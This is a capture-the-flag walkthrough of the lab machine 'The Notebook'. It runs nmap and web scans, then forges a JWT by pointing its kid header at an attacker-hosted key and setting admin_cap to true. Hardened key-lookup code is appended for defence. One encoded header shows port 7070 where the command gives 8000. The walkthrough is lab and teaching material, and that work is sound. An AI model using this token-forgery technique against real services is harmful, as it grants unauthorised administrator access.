$ sudo nmap -p- -T4 -A 10.10.10.230
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
| 256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_ 256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
$ dirb http://10.10.10.230
---- Scanning URL: http://10.10.10.230/ ----
+ http://10.10.10.230/admin (CODE:403|SIZE:9)
+ http://10.10.10.230/login (CODE:200|SIZE:1250)
+ http://10.10.10.230/logout (CODE:302|SIZE:209)
+ http://10.10.10.230/register (CODE:200|SIZE:1422)
$ nikto -h http://10.10.10.230
+ Server: nginx/1.14.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /static/favicon.ico, inode: 1605673424.0, size: 15406, mtime: 2935163750
+ Allowed HTTP Methods: HEAD, GET, OPTIONS
+ 7864 requests: 0 error(s) and 5 item(s) reported on remote host
Register a user (here cpt) at http://10.10.10.230/register, open the browser's developer console, copy the auth token from the cookies tab and decode it. The first segment is the header:
$ echo eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9 | base64 -d
{"typ":"JWT","alg":"RS256","kid":"http://localhost:7070/privKey.key"}
The second segment is the payload, decoded the same way:
eyJ1c2VybmFtZSI6ImNwdCIsImVtYWlsIjoiY3B0QGhhY2t0aGVib3guaHRiIiwiYWRtaW5fY2FwIjpmYWxzZX0
{"username":"cpt","email":"cpt@hackthebox.htb","admin_cap":false}
Two things stand out: the kid header is a URL, which suggests the server fetches its verification key from wherever kid points, and the payload carries an admin_cap flag. Generate an RSA key pair to host:
$ ssh-keygen -t rsa -b 4096 -m PEM -f privKey.key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in privKey.key
Your public key has been saved in privKey.key.pub
The key fingerprint is:
SHA256:pyvOvTRUA8XPh+721QNCW62N8HGGY+UlD/cdNlR0ny0 kali@kali
Serve the directory that contains privKey.key:
$ sudo python3 -m http.server
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/)
Header with kid pointed at the hosted key:
$ echo '{"typ":"JWT","alg":"RS256","kid":"http://10.10.14.133:8000/privKey.key"}' |base64
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNC4xMzM6NzA3MC9wcml2S2V5LmtleSJ9Cg==
Payload with admin_cap set to true:
$ echo '{"username":"cpt","email":"cpt@hackthebox.htb","admin_cap":true}' |base64
eyJ1c2VybmFtZSI6ImNwdCIsImVtYWlsIjoiY3B0QGhhY2t0aGVib3guaHRiIiwiYWRtaW5fY2FwIjp0cnVlfQo=
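The weakness the steps above rely on is that the token itself tells the server where to fetch the verification key, so a kid naming a host outside the server's control gets the signature checked against a foreign key. The hardened lookup below is added example code, not part of this writeup or of the target application: kid is an opaque label into a fixed server-side key map, alg is pinned, and URL- or path-shaped kids are refused before any key is loaded. TRUSTED_KEYS and the kid notebook-2021 are constructed placeholders; PAGE_HEADER is the header segment of the token decoded above, and the encode helper shows the base64url form JWT segments actually use (no padding, no trailing newline, unlike plain echo | base64).

```python
import base64
import json
import re
from urllib.parse import urlparse

# Server-side key store, kid -> PEM public key. Constructed placeholder, not a real key.
TRUSTED_KEYS = {
    "notebook-2021": "-----BEGIN PUBLIC KEY-----\nPLACEHOLDER\n-----END PUBLIC KEY-----\n",
}
ALLOWED_ALGS = {"RS256"}
KID_PATTERN = re.compile(r"^[A-Za-z0-9_-]{1,64}$")  # an opaque label, never a locator
# Header segment exactly as it appears in the token issued by the application above.
PAGE_HEADER = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhv"
               "c3Q6NzA3MC9wcml2S2V5LmtleSJ9")

def b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url without padding; restore the padding before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(data: bytes) -> str:
    """Inverse of the above: base64url, no padding, no trailing newline."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def unverified_header(token: str) -> dict:
    """Parse only the header. Nothing in it is trusted until the signature verifies."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token: expected header.payload.signature")
    return json.loads(b64url_decode(parts[0]))

def kid_is_suspicious(kid) -> bool:
    """True when kid looks like a URL or a path rather than a plain key label."""
    if not isinstance(kid, str):
        return True
    if urlparse(kid).scheme or "/" in kid or "\\" in kid or ".." in kid:
        return True
    return KID_PATTERN.fullmatch(kid) is None

def resolve_key(token: str):
    """Hardened lookup returning (pem, reason): kid only indexes the fixed key map,
    alg is pinned, and the token never tells the server where to fetch a key from."""
    hdr = unverified_header(token)
    if hdr.get("alg") not in ALLOWED_ALGS:
        return None, f"alg not allowed: {hdr.get('alg')!r}"
    kid = hdr.get("kid")
    if kid_is_suspicious(kid) or kid not in TRUSTED_KEYS:
        return None, f"kid rejected: {kid!r}"
    return TRUSTED_KEYS[kid], "ok"
```

A real verifier would pass the returned PEM to its RS256 check; the point here is that the key choice never leaves the server's own map, so hosting a key elsewhere gains nothing.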